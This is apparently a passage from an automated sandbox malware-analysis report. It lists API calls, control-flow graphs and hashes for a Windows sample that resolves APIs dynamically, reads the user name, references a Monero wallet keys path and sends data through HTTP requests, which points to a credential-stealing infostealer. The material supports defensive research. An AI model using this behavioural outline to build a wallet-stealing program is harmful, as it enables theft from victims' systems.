                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeapProtectVirtual
                        • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                        • API String ID: 1542196881-2218711628
                        • Opcode ID: 67003c8eb56187b13cfd0defb1b68fd4b48fbdee34b8808e76e7c03d2af51c39
                        • Instruction ID: 0114b5abe20686a843e51c6e1344dab1923c9bbf99c2ba65172ca28926fd27db
                        • Opcode Fuzzy Hash: 67003c8eb56187b13cfd0defb1b68fd4b48fbdee34b8808e76e7c03d2af51c39
                        • Instruction Fuzzy Hash: D14101247C2608EEE634B7A7A867EBD76575FC3708F535040EB4152FA0CEB069807726
                        Function 006D4880 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 479networkstringfileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 801 6d4880-6d4942 call 6ea7a0 call 6d47b0 call 6ea740 * 5 InternetOpenA StrCmpCA 816 6d494b-6d494f 801->816 817 6d4944 801->817 818 6d4ecb-6d4ef3 InternetCloseHandle call 6eaad0 call 6d9ac0 816->818 819 6d4955-6d4acd call 6e8b60 call 6ea920 call 6ea8a0 call 6ea800 * 2 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea920 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea920 call 6ea8a0 call 6ea800 * 2 InternetConnectA 816->819 817->816 829 6d4ef5-6d4f2d call 6ea820 call 6ea9b0 call 6ea8a0 call 6ea800 818->829 830 6d4f32-6d4fa2 call 6e8990 * 2 call 6ea7a0 call 6ea800 * 8 818->830 819->818 905 6d4ad3-6d4ad7 819->905 829->830 906 6d4ad9-6d4ae3 905->906 907 6d4ae5 905->907 908 6d4aef-6d4b22 HttpOpenRequestA 906->908 907->908 909 6d4ebe-6d4ec5 InternetCloseHandle 908->909 910 6d4b28-6d4e28 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea920 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea920 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea920 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea9b0 call 6ea8a0 call 6ea800 call 6ea920 call 6ea8a0 call 6ea800 call 6ea740 call 6ea920 * 2 call 6ea8a0 call 6ea800 * 2 call 6eaad0 lstrlen call 6eaad0 * 2 lstrlen call 6eaad0 HttpSendRequestA 908->910 909->818 1021 6d4e32-6d4e5c InternetReadFile 910->1021 1022 6d4e5e-6d4e65 1021->1022 1023 6d4e67-6d4eb9 InternetCloseHandle call 6ea800 1021->1023 1022->1023 1024 6d4e69-6d4ea7 call 6ea9b0 call 6ea8a0 call 6ea800 1022->1024 1023->909 1024->1021
                        APIs
                          • Part of subcall function 006EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006EA7E6
                          • Part of subcall function 006D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 006D4839
                          • Part of subcall function 006D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 006D4849
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006D4915
                        • StrCmpCA.SHLWAPI(?,00E4EAE8), ref: 006D493A
                        • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 006D4ABA
                        • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,006F0DDB,00000000,?,?,00000000,?,",00000000,?,00E4EAC8), ref: 006D4DE8
                        • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 006D4E04
                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 006D4E18
                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 006D4E49
                        • InternetCloseHandle.WININET(00000000), ref: 006D4EAD
                        • InternetCloseHandle.WININET(00000000), ref: 006D4EC5
                        • HttpOpenRequestA.WININET(00000000,00E4E9F8,?,00E4E248,00000000,00000000,00400100,00000000), ref: 006D4B15
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                        • InternetCloseHandle.WININET(00000000), ref: 006D4ECF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                        • String ID: "$"$------$------$------$H$x$
                        • API String ID: 460715078-1516566845
                        • Opcode ID: 131b8a2e5447635b5ee9fbc3956404e2d8f187b69d7b6d84ce3cd6e738fb7c3a
                        • Instruction ID: d7969bd3236d975f61dae5a2a9ddeaa3c2cffdfd157d03fd2aa887e041691e3b
                        • Opcode Fuzzy Hash: 131b8a2e5447635b5ee9fbc3956404e2d8f187b69d7b6d84ce3cd6e738fb7c3a
                        • Instruction Fuzzy Hash: 2A120C71912258AADB55EB91DC92FEEB33ABF14300F51419DB10662092EF703F49CF6A
                        Function 006E7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006D11B7), ref: 006E7880
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006E7887
                        • GetUserNameA.ADVAPI32(00000104,00000104), ref: 006E789F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateNameProcessUser
                        • String ID:
                        • API String ID: 1296208442-0
                        • Opcode ID: 42c32d53a1117c251bffa1157c88d32d0a47c39f6f571db529be903c2803f66d
                        • Instruction ID: dbb31edb2316b91565102435d2b075c85d558bfbc9892f04c4fd1be329b8866c
                        • Opcode Fuzzy Hash: 42c32d53a1117c251bffa1157c88d32d0a47c39f6f571db529be903c2803f66d
                        • Instruction Fuzzy Hash: A4F04FB1E49248ABC710DF99DD49BAEBBB8EB04711F10425AFA15A2680C7781904CBA2
                        Function 006D1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitInfoProcessSystem
                        • String ID:
                        • API String ID: 752954902-0
                        • Opcode ID: 322a9df70df75e3eef6356ca29277dbc770179c89d05c3dc3fd0f69d2099246b
                        • Instruction ID: 800a7988c76eddaca5a7b8dfa33125883a9dc0b3c55f042933f91d965d4dfedf
                        • Opcode Fuzzy Hash: 322a9df70df75e3eef6356ca29277dbc770179c89d05c3dc3fd0f69d2099246b
                        • Instruction Fuzzy Hash: E1D05E74E0530CEBCB00DFE0DC496DDBBB8FB0C321F000595D90562380EA305981CAA6
                        Function 006E9C10 Relevance: 222.9, APIs: 112, Strings: 15, Instructions: 684libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 633 6e9c10-6e9c1a 634 6ea036-6ea0ca LoadLibraryA * 8 633->634 635 6e9c20-6ea031 GetProcAddress * 43 633->635 636 6ea0cc-6ea141 GetProcAddress * 5 634->636 637 6ea146-6ea14d 634->637 635->634 636->637 638 6ea216-6ea21d 637->638 639 6ea153-6ea211 GetProcAddress * 8 637->639 640 6ea21f-6ea293 GetProcAddress * 5 638->640 641 6ea298-6ea29f 638->641 639->638 640->641 642 6ea337-6ea33e 641->642 643 6ea2a5-6ea332 GetProcAddress * 6 641->643 644 6ea41f-6ea426 642->644 645 6ea344-6ea41a GetProcAddress * 9 642->645 643->642 646 6ea428-6ea49d GetProcAddress * 5 644->646 647 6ea4a2-6ea4a9 644->647 645->644 646->647 648 6ea4dc-6ea4e3 647->648 649 6ea4ab-6ea4d7 GetProcAddress * 2 647->649 650 6ea515-6ea51c 648->650 651 6ea4e5-6ea510 GetProcAddress * 2 648->651 649->648 652 6ea612-6ea619 650->652 653 6ea522-6ea60d GetProcAddress * 10 650->653 651->650 654 6ea67d-6ea684 652->654 655 6ea61b-6ea678 GetProcAddress * 4 652->655 653->652 656 6ea69e-6ea6a5 654->656 657 6ea686-6ea699 GetProcAddress 654->657 655->654 658 6ea708-6ea709 656->658 659 6ea6a7-6ea703 GetProcAddress * 4 656->659 657->656 659->658
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,00E35B30), ref: 006E9C2D
                        • GetProcAddress.KERNEL32(74DD0000,00E35B10), ref: 006E9C45
                        • GetProcAddress.KERNEL32(74DD0000,00E49640), ref: 006E9C5E
                        • GetProcAddress.KERNEL32(74DD0000,00E49628), ref: 006E9C76
                        • GetProcAddress.KERNEL32(74DD0000,00E49670), ref: 006E9C8E
                        • GetProcAddress.KERNEL32(74DD0000,00E49688), ref: 006E9CA7
                        • GetProcAddress.KERNEL32(74DD0000,00E3B5E0), ref: 006E9CBF
                        • GetProcAddress.KERNEL32(74DD0000,00E4D188), ref: 006E9CD7
                        • GetProcAddress.KERNEL32(74DD0000,00E4D2D8), ref: 006E9CF0
                        • GetProcAddress.KERNEL32(74DD0000,00E4D338), ref: 006E9D08
                        • GetProcAddress.KERNEL32(74DD0000,00E4D1B8), ref: 006E9D20
                        • GetProcAddress.KERNEL32(74DD0000,00E35BD0), ref: 006E9D39
                        • GetProcAddress.KERNEL32(74DD0000,00E35C70), ref: 006E9D51
                        • GetProcAddress.KERNEL32(74DD0000,00E35BF0), ref: 006E9D69
                        • GetProcAddress.KERNEL32(74DD0000,00E35C10), ref: 006E9D82
                        • GetProcAddress.KERNEL32(74DD0000,00E4D170), ref: 006E9D9A
                        • GetProcAddress.KERNEL32(74DD0000,00E4D0F8), ref: 006E9DB2
                        • GetProcAddress.KERNEL32(74DD0000,00E3B6D0), ref: 006E9DCB
                        • GetProcAddress.KERNEL32(74DD0000,00E35C30), ref: 006E9DE3
                        • GetProcAddress.KERNEL32(74DD0000,00E4D308), ref: 006E9DFB
                        • GetProcAddress.KERNEL32(74DD0000,00E4D2C0), ref: 006E9E14
                        • GetProcAddress.KERNEL32(74DD0000,00E4D140), ref: 006E9E2C
                        • GetProcAddress.KERNEL32(74DD0000,00E4D3B0), ref: 006E9E44
                        • GetProcAddress.KERNEL32(74DD0000,00E35C90), ref: 006E9E5D
                        • GetProcAddress.KERNEL32(74DD0000,00E4D290), ref: 006E9E75
                        • GetProcAddress.KERNEL32(74DD0000,00E4D320), ref: 006E9E8D
                        • GetProcAddress.KERNEL32(74DD0000,00E4D350), ref: 006E9EA6
                        • GetProcAddress.KERNEL32(74DD0000,00E4D3E0), ref: 006E9EBE
                        • GetProcAddress.KERNEL32(74DD0000,00E4D278), ref: 006E9ED6
                        • GetProcAddress.KERNEL32(74DD0000,00E4D3C8), ref: 006E9EEF
                        • GetProcAddress.KERNEL32(74DD0000,00E4D1D0), ref: 006E9F07
                        • GetProcAddress.KERNEL32(74DD0000,00E4D110), ref: 006E9F1F
                        • GetProcAddress.KERNEL32(74DD0000,00E4D158), ref: 006E9F38
                        • GetProcAddress.KERNEL32(74DD0000,00E4A8A0), ref: 006E9F50
                        • GetProcAddress.KERNEL32(74DD0000,00E4D128), ref: 006E9F68
                        • GetProcAddress.KERNEL32(74DD0000,00E4D1A0), ref: 006E9F81
                        • GetProcAddress.KERNEL32(74DD0000,00E35CB0), ref: 006E9F99
                        • GetProcAddress.KERNEL32(74DD0000,00E4D1E8), ref: 006E9FB1
                        • GetProcAddress.KERNEL32(74DD0000,00E35A90), ref: 006E9FCA
                        • GetProcAddress.KERNEL32(74DD0000,00E4D200), ref: 006E9FE2
                        • GetProcAddress.KERNEL32(74DD0000,00E4D218), ref: 006E9FFA
                        • GetProcAddress.KERNEL32(74DD0000,00E356B0), ref: 006EA013
                        • GetProcAddress.KERNEL32(74DD0000,00E35750), ref: 006EA02B
                        • LoadLibraryA.KERNEL32(00E4D230,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA03D
                        • LoadLibraryA.KERNEL32(00E4D380,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA04E
                        • LoadLibraryA.KERNEL32(00E4D248,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA060
                        • LoadLibraryA.KERNEL32(00E4D368,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA072
                        • LoadLibraryA.KERNEL32(00E4D260,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA083
                        • LoadLibraryA.KERNEL32(00E4D2A8,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA095
                        • LoadLibraryA.KERNEL32(00E4D2F0,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA0A7
                        • LoadLibraryA.KERNEL32(00E4D398,?,006E5CA3,006F0AEB,?,?,?,?,?,?,?,?,?,?,006F0AEA,006F0AE3), ref: 006EA0B8
                        • GetProcAddress.KERNEL32(75290000,00E35810), ref: 006EA0DA
                        • GetProcAddress.KERNEL32(75290000,00E4D4B8), ref: 006EA0F2
                        • GetProcAddress.KERNEL32(75290000,00E48FF8), ref: 006EA10A
                        • GetProcAddress.KERNEL32(75290000,00E4D4A0), ref: 006EA123
                        • GetProcAddress.KERNEL32(75290000,00E358F0), ref: 006EA13B
                        • GetProcAddress.KERNEL32(6FE30000,00E3B7E8), ref: 006EA160
                        • GetProcAddress.KERNEL32(6FE30000,00E35970), ref: 006EA179
                        • GetProcAddress.KERNEL32(6FE30000,00E3B810), ref: 006EA191
                        • GetProcAddress.KERNEL32(6FE30000,00E4D440), ref: 006EA1A9
                        • GetProcAddress.KERNEL32(6FE30000,00E4D578), ref: 006EA1C2
                        • GetProcAddress.KERNEL32(6FE30000,00E357F0), ref: 006EA1DA
                        • GetProcAddress.KERNEL32(6FE30000,00E357D0), ref: 006EA1F2
                        • GetProcAddress.KERNEL32(6FE30000,00E4D470), ref: 006EA20B
                        • GetProcAddress.KERNEL32(752C0000,00E35730), ref: 006EA22C
                        • GetProcAddress.KERNEL32(752C0000,00E35930), ref: 006EA244
                        • GetProcAddress.KERNEL32(752C0000,00E4D560), ref: 006EA25D
                        • GetProcAddress.KERNEL32(752C0000,00E4D5A8), ref: 006EA275
                        • GetProcAddress.KERNEL32(752C0000,00E35A70), ref: 006EA28D
                        • GetProcAddress.KERNEL32(74EC0000,00E3B608), ref: 006EA2B3
                        • GetProcAddress.KERNEL32(74EC0000,00E3B928), ref: 006EA2CB
                        • GetProcAddress.KERNEL32(74EC0000,00E4D4D0), ref: 006EA2E3
                        • GetProcAddress.KERNEL32(74EC0000,00E358B0), ref: 006EA2FC
                        • GetProcAddress.KERNEL32(74EC0000,00E358D0), ref: 006EA314
                        • GetProcAddress.KERNEL32(74EC0000,00E3B630), ref: 006EA32C
                        • GetProcAddress.KERNEL32(75BD0000,00E4D4E8), ref: 006EA352
                        • GetProcAddress.KERNEL32(75BD0000,00E359B0), ref: 006EA36A
                        • GetProcAddress.KERNEL32(75BD0000,00E48FB8), ref: 006EA382
                        • GetProcAddress.KERNEL32(75BD0000,00E4D530), ref: 006EA39B
                        • GetProcAddress.KERNEL32(75BD0000,00E4D428), ref: 006EA3B3
                        • GetProcAddress.KERNEL32(75BD0000,00E35790), ref: 006EA3CB
                        • GetProcAddress.KERNEL32(75BD0000,00E359F0), ref: 006EA3E4
                        • GetProcAddress.KERNEL32(75BD0000,00E4D410), ref: 006EA3FC
                        • GetProcAddress.KERNEL32(75BD0000,00E4D458), ref: 006EA414
                        • GetProcAddress.KERNEL32(75A70000,00E35770), ref: 006EA436
                        • GetProcAddress.KERNEL32(75A70000,00E4D488), ref: 006EA44E
                        • GetProcAddress.KERNEL32(75A70000,00E4D590), ref: 006EA466
                        • GetProcAddress.KERNEL32(75A70000,00E4D500), ref: 006EA47F
                        • GetProcAddress.KERNEL32(75A70000,00E4D518), ref: 006EA497
                        • GetProcAddress.KERNEL32(75450000,00E35890), ref: 006EA4B8
                        • GetProcAddress.KERNEL32(75450000,00E35830), ref: 006EA4D1
                        • GetProcAddress.KERNEL32(75DA0000,00E357B0), ref: 006EA4F2
                        • GetProcAddress.KERNEL32(75DA0000,00E4D3F8), ref: 006EA50A
                        • GetProcAddress.KERNEL32(6F070000,00E359D0), ref: 006EA530
                        • GetProcAddress.KERNEL32(6F070000,00E356D0), ref: 006EA548
                        • GetProcAddress.KERNEL32(6F070000,00E35910), ref: 006EA560
                        • GetProcAddress.KERNEL32(6F070000,00E4D548), ref: 006EA579
                        • GetProcAddress.KERNEL32(6F070000,00E356F0), ref: 006EA591
                        • GetProcAddress.KERNEL32(6F070000,00E35710), ref: 006EA5A9
                        • GetProcAddress.KERNEL32(6F070000,00E35950), ref: 006EA5C2
                        • GetProcAddress.KERNEL32(6F070000,00E35990), ref: 006EA5DA
                        • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 006EA5F1
                        • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 006EA607
                        • GetProcAddress.KERNEL32(75AF0000,00E4D080), ref: 006EA629
                        • GetProcAddress.KERNEL32(75AF0000,00E49028), ref: 006EA641
                        • GetProcAddress.KERNEL32(75AF0000,00E4D038), ref: 006EA659
                        • GetProcAddress.KERNEL32(75AF0000,00E4D0B0), ref: 006EA672
                        • GetProcAddress.KERNEL32(75D90000,00E35850), ref: 006EA693
                        • GetProcAddress.KERNEL32(6CFC0000,00E4CE28), ref: 006EA6B4
                        • GetProcAddress.KERNEL32(6CFC0000,00E35870), ref: 006EA6CD
                        • GetProcAddress.KERNEL32(6CFC0000,00E4CE40), ref: 006EA6E5
                        • GetProcAddress.KERNEL32(6CFC0000,00E4CEE8), ref: 006EA6FD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
